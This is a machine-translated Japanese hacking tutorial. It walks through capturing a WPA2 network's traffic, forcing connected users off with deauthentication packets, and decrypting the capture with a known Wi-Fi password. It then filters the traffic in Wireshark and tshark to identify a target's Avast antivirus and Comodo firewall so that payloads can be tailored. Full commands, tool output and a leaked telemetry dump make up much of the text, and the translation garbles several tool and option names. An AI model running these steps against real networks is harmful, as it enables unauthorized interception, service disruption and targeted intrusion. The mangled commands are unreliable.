Windows コンピューターにインストールされているウイルス対策およびファイアウォール ソフトウェアを特定することは、攻撃者が標的のステージャーまたはペイロードを作成する準備をする上で非常に重要です。 秘密のディープ パケット インスペクションを使用すると、その情報を簡単に特定できます。
この攻撃は、ターゲット ネットワークへの Wi-Fi パスワードが既知であることを前提としています。 攻撃者はパスワードを使用して、ネットワークを通過するデータを観察し、インストールされているセキュリティ ソフトウェアを列挙できます。 一般的なウイルス対策およびファイアウォール ソリューションは、無害な Web トラフィックが除外されると簡単に識別できるようになります。
ターゲット ルーターへの認証を行わずに Wi-Fi トラフィックをキャプチャして復号化する方法を学習し、パケット検査を実行して、オペレーティング システムにインストールされているサードパーティ製セキュリティ アプリケーションの種類を特定します。
- お見逃しなく: ローカル ネットワークで Windows パスワードを傍受する
ステップ 1: Wi-Fi トラフィックをキャプチャする
Kali を使い始めるには、airmon-ngコマンドを実行して、ワイヤレス カードに干渉する可能性のあるバックグラウンドで実行されているすべてのプロセスを停止します。
~# airmon-ng check kill
Killing these processes:
PID Name
2891 wpa_supplicant
Alfa アダプター (または別のワイヤレス アダプタ) とともにairmon-ng 開始 wlan0指図。
~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy2 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy2]wlan0 on [phy2]wlan0mon)
(mac80211 station mode vif disabled for [phy2]wlan0)
次に、イニシャルを実行しますairodump-ngスキャンして、周辺エリアの Wi-Fi ネットワークを列挙します。
~# airodump-ng wlan0mon
CH 6 ][ Elapsed: 36 s ][ 2020-04-06 20:45
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -19 13 6 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
ルーターが識別されたら、Control-C を押してスキャンを停止します。 を含めることにより、Wi-Fi ルーターに対してターゲットを絞ったパケット キャプチャを実行します。-チャネル、-書く、–bssid、 と–essidオプション。
~# airodump-ng --channel 11 --write /root/Desktop/capture --bssid "00:20:91:B4:F8:33" --essid "NullByte_Network" wlan0mon
CH 9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -20 100 8308 1895 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
Aireplay-ng は、ルーターに接続されているデバイスの認証を解除します。 このコマンドは、WPA2 ハンドシェイク データをキャプチャするために必要です。 キャプチャされたパケットは、有効なハンドシェイクでのみ復号化できます。
新しいターミナルを開き、次を使用しますairplay-ngコマンドを実行して、3 つの「deauth」パケットをルーターに送信し、認証されたユーザーに再接続を強制します。
~# aireplay-ng -0 3 -a 00:20:91:B4:F8:33 -e "NullByte_Network" wlan0mon
05:12:46 Waiting for beacon frame (BSSID: 00:20:91:B4:F8:33) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
05:12:46 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:46 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:47 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
攻撃が成功すると、画面の右上隅に「WPA ハンドシェイク」通知が生成されます。airodump-ngターミナル。
CH 9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ][ WPA handshake: 00:20:91:B4:F8:33 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -20 100 8308 1895 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
この時点で、airodump-ngwindow は、できるだけ長く (つまり、何時間も) パケットをキャプチャし続ける必要があります。 時間が経つにつれて、ターゲットの Windows 10 コンピューターのセキュリティ ソフトウェアは、アプリケーションとウイルス定義データベースを定期的に更新しようとします。 これらの Web クエリは、標的型攻撃を開始する準備をしているネットワークにアクセスできるハッカーにとって価値があります。
ステップ 2: PCAP を復号化する
Airdecap-ng は、パケット キャプチャ復号化ツールであり、Aircrack-ng スイートの一部です。
~# airdecap-ng -b "00:20:91:B4:F8:33" -e "NullByte_Network" -p "WIFI_PASSWORD_HERE" /root/Desktop/capture-01.cap
Total number of stations seen 8
Total number of packets read 32310
Total number of WEP data packets 0
Total number of WPA data packets 4555
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 3435
Number of bad TKIP (WPA) packets 0
Number of bad CCMP (WPA) packets 0
Airdecap-ng は、Wi-Fi ESSID (-e) とパスワード (-p) を使用して、ネットワークに属するパケットを復号化し、フィルターで除外します。 上記の例では、3435 個の WPA 復号化パケットを確認できます。 Airdecap-ng は、現在のディレクトリに「capture-01-dec.cap」というファイルを作成します。
PCAP を復号化した後、新しい capture-01-dec.cap ファイルを Wireshark にインポートします。
ステップ 3: ウイルス対策ソフトウェア (Avast) を検索する
アバスト世界で最も人気のあるウイルス対策ソフトウェア ソリューションの 1 つです。
既知のアバスト ドメインには、avast.com と、主要なコンテンツ配信ネットワーク (CDN) である avcdn.net が含まれます。 これらのドメインは、ウイルス データベースとソフトウェアの更新を取得し、テレメトリ情報を送信するために日常的に使用されます。 これらのドメインは、Wireshark で次の表示フィルタを使用して除外できます。
ip.host ~ "(?i)(avast|avcdn)\.*"
多くのウイルス対策ドメインをフィルターに追加して、垂直バー (|) で区切ることができます。
上記の結果は、コンピューターが Avast ウイルス対策ソフトウェアを使用していることを強く示しています。 データをさらに検査して、このウイルス対策プロバイダーで一般的に使用されるユーザー エージェント文字列を特定できます。
http.user_agent ~ "(?i)avast*"
この特定の HTTP ストリームは POST リクエストを呼び出し、暗号化されていないデータをアバスト サーバーに配信しました。 ご覧のとおり、リクエストはアバスト ユーザー エージェントを使用して Windows 10 コンピューターから発信されました。
HTTP ストリームの本文には、ターゲット デバイスに関連する暗号化されていないデータが含まれています。 CPU の種類、Windows 10 のホスト名、マザーボードのアーキテクチャ、およびアバストのバージョンと構成設定は、単一の HTTP ストリームから検出できます。
POST /cgi-bin/iavs4stats.cgi HTTP/1.1
Host: v7.stats.avast.com
User-Agent: avast! Antivirus (instup)
Accept: */*
Content-MD5:
Content-Type: iavs4/stats
Content-Length:
GCHBitmap=0
GChBrand=AVFC
GTBBitmap=0
GTBBrand=
InstupVersion=19.5.4444.0
IsVirtual=1
NoRegistration=0
OfferEvent=0
OfferResult=2
SZB=0
ScAsAvastReg=1
ScAsAvastStatus=off
ScAsOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAsOtherReg=2
ScAsOtherStatus=on,off,
ScAvAvastReg=1
ScAvAvastStatus=off
ScAvOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAvOtherReg=2
ScAvOtherStatus=on,off,
ScFwAvastReg=0
ScFwAvastStatus=
ScFwOtherList=Windows Firewall,
ScFwOtherReg=1
ScFwOtherStatus=on,
ShepherdConfigName=Avast-Windows-AV-Consumer_email-signatures_antitrack-production_production-new-installs_version-18.6-and-higher_driver-updater-production_v19.3-and-higher_v18.7-and-higher_v2017_test-datasharing-consent_test-antitrack-text-b_free_test-upsell-screens_smartscan-last-screen_new-recomendo_production_version-17.9-and-higher_avast-19-r5_smartscan-free---antivirus_v18.3-and-higher_alpha-new-installs_mybackend-on_test-pam-no-master-password_v18.5-and-higher_chrome-installed-by-avast_cleanup-premium-installation
UpdatingTime=0
WEI_Cpu=8.4
WEI_D3D=9.9
WEI_Disk=7.3
WEI_Graphics=2.4
WEI_Memory=5.5
WEI_SystemRating=2.4
boot_time_scan_accepted=0
boot_time_scan_offered=0
brandCode=AVFC
bytes=199216597
bytesOK=199216597
community=1
cookie=mmm_ava_tst_004_762_b
cpu_name=Intel(R) Core(TM) i7-7700 CPU @ 2.80GHz,4
custom_scan_created=0
edition=1
gsMainStatus=0
gsNoticeNotifs=0
gsUrgentNotifs=0
gsWarningNotifs=0
gui_opened=4
gui_settings_altered=0
gui_settings_opened=0
guid=xxxxxxxx-xxxx-xxxx-xxxx-xx
help_opened=0
idate_w=1508774395
lan_addr=tokyoneon-PC
lan_ip=192.168.1.152
lang=0409
licAlpha=1
licExpDays=30
licExpirationDate=1562974590
licFeature=5f0231d7-4c46-4855-8199-5d0cb185d427
licIssuedDate=1560382590
licSchemaId=avast-free-1s1m_1s1m
licType=Trial
licType2=4
offerInstReturn=0
offerReasons=0
offerType=1
on_demand_scan_invoked=0
operation=3
os=win,10,0,2,16299,0,AMD64
part.program=2378,2378,0,0
part.setup=2378,2378,0,0
part.vps=419828228,419828228,0,0
passive_mode=0
product=ais
ram_mb=4990
repo_id=iavs9x
serial=0
silent=0
status=00000000
statver=2.20
tspan=454
tspanOK=454
version=19.5.2378
statsSendTime=1260399041
このデータは、攻撃者がそのユーザーとオペレーティング システムに固有のペイロードを作成できるようにするため、ネットワーク上の攻撃者にとって非常に価値があります。
Wireshark に加えて、tsharkとgrepDNS 要求をそれぞれ標準出力に簡単に出力およびフィルタリングできます。 追加並べ替え -u一意のドメインのみを表示するコマンドに追加します (つまり、重複はありません)。
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | grep -i "avast\|avcdn" | sort -u
b1477563.iavs9x.u.avast.com
b4380882.iavs9x.u.avast.com
b4380882.vps18.u.avcdn.net
d3336443.vps18.u.avcdn.net
f3355109.iavs9x.u.avast.com
filerep.ff.avast.com
g0679661.iavs9x.u.avast.com
g0679661.vps18.u.avcdn.net
g5041154.vps18.u.avcdn.net
h1745978.iavs9x.u.avast.com
h6891735.vps18.u.avcdn.net
k8528219.iavs9x.u.avast.com
k9290131.iavs9x.u.avast.com
m5972635.vps18.u.avcdn.net
p3357684.vps18.u.avcdn.net
r4907515.vps18.u.avcdn.net
s-iavs9x.avcdn.net
s-vps18.avcdn.net
t7758057.vps18.u.avcdn.net
v6831430.vps18.u.avcdn.net
v7event.stats.avast.com
v7.stats.avast.com
ステップ 4: ファイアウォール ソフトウェア (Comodo) を検索する
Comodo ファイアウォールは、着信トラフィックと発信トラフィックを監視して脅威を特定し、攻撃を防ぐように設計された一般的なファイアウォール ソリューションです。
これはDNS サーバー構成ネットワーク上の攻撃者が、インストールされているアプリケーションや訪問した Web サイトを列挙することを困難にします。 それでも、Comodo ソフトウェアは、攻撃者が必要とするすべての情報を提供するソフトウェアの更新をときどきチェックします。
ip.host ~ "(?i)(comodo)\.*"
照会されたドメインを標準出力で表示するには、PCAP を調べます。tsharkDNS リクエストを除外します。
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name
このコマンドは、何千ものドメイン、IP アドレス、重複するエントリを含む大量の出力を生成する可能性があります。 追加選別とユニーク最も頻繁に照会されるサーバーをカウントするコマンド。
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | sort | uniq -c
2 218.0.101.95.in-addr.arpa
72 22.70.154.156.in-addr.arpa
14 22.71.154.156.in-addr.arpa
1 download.comodo.com
1 ncc.avast.com
1 su.ff.avast.com
2 v10.vortex-win.data.microsoft.com
1 wireshark.org
注意してください 22.70.154.156.in-addr.arpa アドレスは、PCAP に 72 回表示されます。 あクイック検索とIPルックアップ提案する156.154.70.22は長年 Comodo DNS サーバーでした。 これは、標的に Comodo ソフトウェアがインストールされていることを明確に意味するものではありませんが、標的がセキュリティを意識していることを示唆しています。
最終的な考え
この記事で取り上げたのはごく一部ですWireshark ディスプレイ フィルタ. 沢山ありますHTTP、知財、 とDNSターゲットに関する情報を収集する際にハッカーを支援するフィルター。
包括的な人気のあるウイルス対策ソフトウェアのリスト攻撃者は通常、ターゲットの Windows マシンにセキュリティ ソフトウェアがインストールされているかどうかを確実に判断できます。 さらに恐ろしいのは、Wi-Fi ネットワークに接続したり、コンピューターに物理的にアクセスしたりする必要なく、ソフトウェアの列挙が行われることです。
この記事が気に入ったら、Twitter でフォローしてください@tokyooneon_とGitHub私の現在のプロジェクトに遅れずについていくために。 質問や懸念がある場合は、コメントを残すか、Twitter でメッセージを送ってください。
